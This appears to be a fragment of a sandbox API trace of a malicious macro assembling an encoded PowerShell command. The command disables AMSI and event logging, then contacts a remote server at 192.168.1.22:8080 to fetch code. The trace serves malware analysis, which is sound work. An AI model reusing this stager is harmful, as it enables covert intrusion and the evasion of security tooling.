HMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG", bstrRight="4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.833] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwA", bstrRight="dABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcw", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.833] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcw", bstrRight="A7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.833] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3", bstrRight="AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.834] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC", bstrRight="4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.835] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA", bstrRight="QwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.835] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB